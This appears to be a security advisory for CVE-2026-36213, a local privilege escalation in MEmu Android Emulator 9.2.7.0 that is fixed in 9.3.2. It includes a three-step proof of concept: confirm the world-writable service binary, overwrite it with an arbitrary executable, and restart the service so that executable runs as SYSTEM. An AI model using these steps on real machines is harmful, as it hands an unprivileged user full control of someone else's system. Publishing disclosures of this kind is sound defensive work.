## https://sploitus.com/exploit?id=PACKETSTORM:223278
# CVE-2026-36213
CVE-2026-36213 | Local Privilege Escalation in MEmu Android Emulator 9.2.7.0 via Insecure Service Binary Permissions | Patched in 9.3.2
# CVE-2026-36213 โ MEmu Android Emulator 9.2.7.0 LPE
## Summary
A Local Privilege Escalation (LPE) vulnerability in **MEmu Android Emulator 9.2.7.0**.
The service `MEmuSVC` runs as `NT AUTHORITY\SYSTEM` while its binary is writable by any local user, allowing full system compromise.
| Field | Details |
|-------|---------|
| **CVE** | CVE-2026-36213 |
| **Product** | MEmu Android Emulator (MicroVirt) |
| **Affected Version** | 9.2.7.0 and earlier |
| **Fixed Version** | 9.3.2 |
| **CWE** | CWE-732 / CWE-269 |
| **CVSS v3.1** | 7.8 HIGH `AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` |
| **ATT&CK** | [T1574.010](https://attack.mitre.org/techniques/T1574/010/) |
---
## Vulnerability
`MEmuService.exe` is installed as a SYSTEM-level Windows service with insecure NTFS permissions:
```cmd
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
BUILTIN\Users:(F) โ Any local user has Full Control
Everyone:(F) โ World-writable binar
```
## Proof of Concept
:: Step 1 - Verify vulnerable permissions
```cmd
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
```
:: Step 2 - Replace binary (as low-priv user)
```cmd
copy malicious.exe "C:\Program Files\Microvirt\MEmu\MemuService.exe" /Y
```
:: Step 3 - Restart service
```cmd
sc stop MEmuSVC && sc start MEmuSVC
```
:: Result: malicious.exe runs as NT AUTHORITY\SYSTEM
## Detection Script
Available at: https://github.com/sec-zone/Hijack-service-binaries
## Disclaimer
This research was conducted for educational purposes under responsible disclosure policy.
The author is not responsible for any misuse of this information.
## Researcher
Name: Mohammad Hossein Ashofte Yazdi
Linkedin: https://www.linkedin.com/in/seczone64
Twitter: @sec_zone64
Email: sec.zone64@gmail.com